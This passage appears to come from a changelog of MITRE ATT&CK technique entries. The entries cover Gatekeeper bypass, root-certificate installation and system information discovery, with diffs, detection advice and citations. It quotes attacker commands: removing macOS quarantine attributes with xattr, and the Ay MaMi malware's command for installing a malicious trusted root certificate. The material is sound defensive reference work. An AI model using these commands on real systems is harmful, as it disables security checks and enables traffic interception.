\"Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.\", \"url\": \"https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/\"}, \"root['external_references'][6]\": {\"source_name\": \"Methods of Mac Malware Persistence\", \"description\": \"Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.\", \"url\": \"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf\"}, \"root['external_references'][7]\": {\"source_name\": \"Clearing quarantine attribute\", \"description\": \"Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.\", \"url\": \"https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/\"}, \"root['external_references'][8]\": {\"source_name\": \"OceanLotus for OS X\", \"description\": \"Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.\", \"url\": \"https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may modify file attributes that signify programs | t | 1 | Adversaries may modify file attributes that signify programs |
| > | are from untrusted sources to subvert Gatekeeper controls. | > | are from untrusted sources to subvert Gatekeeper controls i | ||
| > | In macOS and OS X, when applications or programs are downloa | > | n macOS. When documents, applications, or programs are downl | ||
| > | ded from the internet, there is a special attribute set on t | > | oaded an extended attribute (xattr) called <code>com.apple.q | ||
| > | he file called <code>com.apple.quarantine</code>. This attri | > | uarantine</code> can be set on the file by the application p | ||
| > | bute is read by Apple's Gatekeeper defense program at execut | > | erforming the download. This attribute, also known as a quar | ||
| > | ion time and provides a prompt to the user to allow or deny | > | antine flag, is read by Apple's Gatekeeper defense program w | ||
| > | execution. Apps loaded onto the system from USB flash driv | > | hen the file is run and provides a prompt to the user to all | ||
| > | e, optical disk, external hard drive, or even from a drive s | > | ow or deny execution. Gatekeeper also monitors an applicatio | ||
| > | hared over the local network won\u2019t set this flag. Additional | > | n's usage of dynamic libraries (dylibs) loaded outside the a | ||
| > | ly, it is possible to avoid setting this flag using [Drive-b | > | pplication folder on any quarantined binary, often using the | ||
| > | y Compromise](https://attack.mitre.org/techniques/T1189). Th | > | <code>dlopen</code> function. If the quarantine flag is set | ||
| > | is completely bypasses the built-in Gatekeeper check. (Citat | > | in macOS 10.15+, Gatekeeper also checks for a notarization | ||
| > | ion: Methods of Mac Malware Persistence) The presence of the | > | ticket and sends a cryptographic hash to Apple's servers to | ||
| > | quarantine flag can be checked by the xattr command <code>x | > | check for validity for all unsigned executables.(Citation: T | ||
| > | attr /path/to/MyApp.app</code> for <code>com.apple.quarantin | > | heEclecticLightCompany apple notarization )(Citation: Bypass | ||
| > | e</code>. Similarly, given sudo access or elevated permissio | > | ing Gatekeeper) The quarantine flag is an opt-in system and | ||
| > | n, this attribute can be removed with xattr as well, <code>s | > | not imposed by macOS. If an application opts-in, a file dow | ||
| > | udo xattr -r -d com.apple.quarantine /path/to/MyApp.app</cod | > | nloaded from the Internet will be given a quarantine flag be | ||
| > | e>. (Citation: Clearing quarantine attribute) (Citation: Oce | > | fore being saved to disk. Any application or user with write | ||
| > | anLotus for OS X) In typical operation, a file will be dow | > | permissions to the file can change or strip the quarantine | ||
| > | nloaded from the internet and given a quarantine flag before | > | flag. With elevated permission (sudo), this attribute can be | ||
| > | being saved to disk. When the user tries to open the file o | > | removed from any file. The presence of the <code>com.apple. | ||
| > | r application, macOS\u2019s gatekeeper will step in and check for | > | quarantine</code> quarantine flag can be checked with the xa | ||
| > | the presence of this flag. If it exists, then macOS will th | > | ttr command <code>xattr -l /path/to/examplefile</code>. Simi | ||
| > | en prompt the user to confirmation that they want to run the | > | larly, this attribute can be recursively removed from all fi | ||
| > | program and will even provide the URL where the application | > | les in a folder using xattr, <code>sudo xattr -d com.apple.q | ||
| > | came from. However, this is all based on the file being dow | > | uarantine /path/to/folder</code>.(Citation: 20 macOS Common | ||
| > | nloaded from a quarantine-savvy application. (Citation: Bypa | > | Tools and Techniques)(Citation: TheEclecticLightCompany Quar | ||
| > | ssing Gatekeeper) | > | antine and the flag)(Citation: theevilbit gatekeeper bypass | ||
| > | 2021) Apps and files loaded onto the system from a USB flas | ||||
| > | h drive, optical disk, external hard drive, from a drive sha | ||||
| > | red over the local network, or using the <code>curl</code> c | ||||
| > | ommand do not set this flag. Additionally, it is possible to | ||||
| > | avoid setting this flag using [Drive-by Compromise](https:/ | ||||
| > | /attack.mitre.org/techniques/T1189), which may bypass Gateke | ||||
| > | eper. (Citation: Methods of Mac Malware Persistence)(Citatio | ||||
| > | n: Clearing quarantine attribute)(Citation: OceanLotus for O | ||||
| > | S X) |
/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1553/004",
"external_id": "T1553.004"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/479.html",
"external_id": "CAPEC-479"
},
{
"source_name": "Wikipedia Root Certificate",
"description": "Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.",
"url": "https://en.wikipedia.org/wiki/Root_certificate"
},
{
"source_name": "Operation Emmental",
"description": "Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.",
"url": "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf"
},
{
"source_name": "Kaspersky Superfish",
"description": "Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.",
"url": "https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/"
},
{
"source_name": "SpectorOps Code Signing Dec 2017",
"description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.",
"url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec"
},
{
"source_name": "objective-see ay mami 2018",
"description": "Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.",
"url": "https://objective-see.com/blog/blog_0x26.html"
},
{
"source_name": "Microsoft Sigcheck May 2017",
"description": "Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.",
"url": "https://docs.microsoft.com/sysinternals/downloads/sigcheck"
},
{
"source_name": "Tripwire AppUNBlocker",
"description": "Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.",
"url": "https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Matt Graeber, @mattifestation, SpecterOps",
"Red Canary",
"Travis Smith, Tripwire",
"Itzik Kotler, SafeBreach"
],
"x_mitre_data_sources": [
"Windows Registry: Windows Registry Key Creation",
"Windows Registry: Windows Registry Key Modification",
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Digital Certificate Validation"
],
"x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-25 19:39:07.001000+00:00\", \"old_value\": \"2020-03-19 20:31:11.389000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\\n\\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\\n\\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)\\n\\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\\n\\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)\", \"old_value\": \"Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\\n\\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)\\n\\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)\\n\\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)\\n\\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)\", \"diff\": \"--- \\n+++ \\n@@ -1,9 +1,9 @@\\n-Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\\n+Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\\n \\n-Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)\\n+Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\\n \\n-Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)\\n+Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)\\n \\n-Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)\\n+Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\\n \\n-In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)\\n+In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)\"}, \"root['x_mitre_detection']\": {\"new_value\": \"A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)\\n\\nInstalled root certificates are located in the Registry under HKLM\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\ and [HKLM or HKCU]\\\\Software[\\\\Policies\\\\]\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)\\n\\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\\n* CDD4EEAE6000AC7F40C3802C171E30148030C072\", \"old_value\": \"A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)\\n\\nInstalled root certificates are located in the Registry under HKLM\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\ and [HKLM or HKCU]\\\\Software[\\\\Policies\\\\]\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)\\n\\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\\n* CDD4EEAE6000AC7F40C3802C171E30148030C072\", \"diff\": \"--- \\n+++ \\n@@ -1,6 +1,6 @@\\n-A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)\\n+A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)\\n \\n-Installed root certificates are located in the Registry under HKLM\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\ and [HKLM or HKCU]\\\\Software[\\\\Policies\\\\]\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)\\n+Installed root certificates are located in the Registry under HKLM\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\ and [HKLM or HKCU]\\\\Software[\\\\Policies\\\\]\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)\\n \\n * 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\n * 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may install a root certificate on a compromised | t | 1 | Adversaries may install a root certificate on a compromised |
| > | system to avoid warnings when connecting to adversary contro | > | system to avoid warnings when connecting to adversary contro | ||
| > | lled web servers. Root certificates are used in public key c | > | lled web servers. Root certificates are used in public key c | ||
| > | ryptography to identify a root certificate authority (CA). W | > | ryptography to identify a root certificate authority (CA). W | ||
| > | hen a root certificate is installed, the system or applicati | > | hen a root certificate is installed, the system or applicati | ||
| > | on will trust certificates in the root's chain of trust that | > | on will trust certificates in the root's chain of trust that | ||
| > | have been signed by the root certificate. (Citation: Wikipe | > | have been signed by the root certificate.(Citation: Wikiped | ||
| > | dia Root Certificate) Certificates are commonly used for est | > | ia Root Certificate) Certificates are commonly used for esta | ||
| > | ablishing secure TLS/SSL communications within a web browser | > | blishing secure TLS/SSL communications within a web browser. | ||
| > | . When a user attempts to browse a website that presents a c | > | When a user attempts to browse a website that presents a ce | ||
| > | ertificate that is not trusted an error message will be disp | > | rtificate that is not trusted an error message will be displ | ||
| > | layed to warn the user of the security risk. Depending on th | > | ayed to warn the user of the security risk. Depending on the | ||
| > | e security settings, the browser may not allow the user to e | > | security settings, the browser may not allow the user to es | ||
| > | stablish a connection to the website. Installation of a roo | > | tablish a connection to the website. Installation of a root | ||
| > | t certificate on a compromised system would give an adversar | > | certificate on a compromised system would give an adversary | ||
| > | y a way to degrade the security of that system. Adversaries | > | a way to degrade the security of that system. Adversaries h | ||
| > | have used this technique to avoid security warnings promptin | > | ave used this technique to avoid security warnings prompting | ||
| > | g users when compromised systems connect over HTTPS to adver | > | users when compromised systems connect over HTTPS to advers | ||
| > | sary controlled web servers that spoof legitimate websites i | > | ary controlled web servers that spoof legitimate websites in | ||
| > | n order to collect login credentials. (Citation: Operation E | > | order to collect login credentials.(Citation: Operation Emm | ||
| > | mmental) Atypical root certificates have also been pre-inst | > | ental) Atypical root certificates have also been pre-instal | ||
| > | alled on systems by the manufacturer or in the software supp | > | led on systems by the manufacturer or in the software supply | ||
| > | ly chain and were used in conjunction with malware/adware to | > | chain and were used in conjunction with malware/adware to p | ||
| > | provide a man-in-the-middle capability for intercepting inf | > | rovide [Adversary-in-the-Middle](https://attack.mitre.org/te | ||
| > | ormation transmitted over secure TLS/SSL communications. (Ci | > | chniques/T1557) capability for intercepting information tran | ||
| > | tation: Kaspersky Superfish) Root certificates (and their a | > | smitted over secure TLS/SSL communications.(Citation: Kasper | ||
| > | ssociated chains) can also be cloned and reinstalled. Cloned | > | sky Superfish) Root certificates (and their associated chai | ||
| > | certificate chains will carry many of the same metadata cha | > | ns) can also be cloned and reinstalled. Cloned certificate c | ||
| > | racteristics of the source and can be used to sign malicious | > | hains will carry many of the same metadata characteristics o | ||
| > | code that may then bypass signature validation tools (ex: S | > | f the source and can be used to sign malicious code that may | ||
| > | ysinternals, antivirus, etc.) used to block execution and/or | > | then bypass signature validation tools (ex: Sysinternals, a | ||
| > | uncover artifacts of Persistence. (Citation: SpectorOps Cod | > | ntivirus, etc.) used to block execution and/or uncover artif | ||
| > | e Signing Dec 2017) In macOS, the Ay MaMi malware uses <cod | > | acts of Persistence.(Citation: SpectorOps Code Signing Dec 2 | ||
| > | e>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Lib | > | 017) In macOS, the Ay MaMi malware uses <code>/usr/bin/secu | ||
| > | rary/Keychains/System.keychain /path/to/malicious/cert</code | > | rity add-trusted-cert -d -r trustRoot -k /Library/Keychains/ | ||
| > | > to install a malicious certificate as a trusted root certi | > | System.keychain /path/to/malicious/cert</code> to install a | ||
| > | ficate into the system keychain. (Citation: objective-see ay | > | malicious certificate as a trusted root certificate into the | ||
| > | mami 2018) | > | system keychain.(Citation: objective-see ay mami 2018) |
systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1082",
"external_id": "T1082"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/312.html",
"external_id": "CAPEC-312"
},
{
"source_name": "OSX.FairyTale",
"description": "Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.",
"url": "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/"
},
{
"source_name": "20 macOS Common Tools and Techniques",
"description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
"url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
},
{
"source_name": "Amazon Describe Instance",
"description": "Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.",
"url": "https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html"
},
{
"source_name": "Google Instances Resource",
"description": "Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.",
"url": "https://cloud.google.com/compute/docs/reference/rest/v1/instances"
},
{
"source_name": "Microsoft Virutal Machine API",
"description": "Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.",
"url": "https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Maril Vernon @shewhohacks",
"Praetorian"
],
"x_mitre_data_sources": [
"Instance: Instance Metadata",
"Process: Process Creation",
"Command: Command Execution",
"Process: OS API Execution"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"IaaS",
"Linux",
"macOS"
],
"x_mitre_version": "2.3",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-13 23:21:27.750000+00:00\", \"old_value\": \"2021-03-08 10:33:01.066000+00:00\"}, \"root['description']\": {\"new_value\": \"An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\\n\\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\\n\\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)\", \"old_value\": \"An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\\n\\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.\\n\\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\\n \\n-Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.\\n+Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on 